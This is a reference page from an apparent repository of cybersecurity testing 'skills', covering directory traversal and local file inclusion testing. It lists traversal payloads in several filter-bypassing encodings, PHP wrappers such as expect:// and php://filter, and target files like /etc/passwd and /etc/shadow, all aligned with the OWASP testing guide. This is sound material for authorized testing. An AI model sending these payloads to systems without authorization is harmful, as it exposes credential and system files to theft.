creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 13:44:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/performing-directory-traversal-testing/references/api-reference.md
T
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills 
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

58 lines
2.1 KiB
Markdown
Raw Blame History

# API Reference: Performing Directory Traversal Testing
## Traversal Payload Encodings
| Encoding | Example | Description |
|----------|---------|-------------|
| Plain | `../../../etc/passwd` | Standard Unix traversal |
| URL-encoded | `..%2f..%2f..%2fetc%2fpasswd` | Single URL encoding |
| Double-encoded | `..%252f..%252f` | Bypass WAF single-decode |
| UTF-8 overlong | `..%c0%af..%c0%af` | Bypass charset-based filters |
| Backslash (Windows) | `..\\..\\..\\windows\\win.ini` | Windows path traversal |
| Mixed separators | `..././..././` | Bypass recursive stripping |
## PHP Wrapper Protocols (LFI)
| Wrapper | Description |
|---------|-------------|
| `php://filter/convert.base64-encode/resource=` | Read file as base64 |
| `php://input` | Read from POST body |
| `expect://` | Execute system command |
| `data://text/plain;base64,` | Inline data injection |
| `file:///` | Direct file access |
## Vulnerability Indicators
| File | Content Indicator |
|------|-------------------|
| `/etc/passwd` | `root:x:0:0:` |
| `win.ini` | `[fonts]`, `[extensions]` |
| `/proc/self/environ` | Environment variables |
| `/etc/shadow` | Hashed passwords (critical) |
## requests Library
| Method | Description |
|--------|-------------|
| `requests.get(url, allow_redirects=False)` | Send traversal payload |
| `urllib.parse.urlencode(params)` | Encode parameters with payloads |
| `urllib.parse.urlparse(url)` | Parse URL to extract parameters |
## Key Libraries
- **requests** (`pip install requests`): HTTP client for payload delivery
- **urllib.parse** (stdlib): URL parsing and parameter manipulation
## OWASP Testing Guide
| Test ID | Description |
|---------|-------------|
| WSTG-ATHZ-01 | Testing for Directory Traversal / File Include |
## References
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [PortSwigger Directory Traversal](https://portswigger.net/web-security/file-path-traversal)
- [PayloadsAllTheThings - LFI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)
- [HackTricks LFI](https://book.hacktricks.xyz/pentesting-web/file-inclusion)
Reference in New Issue View Git Blame Copy Permalink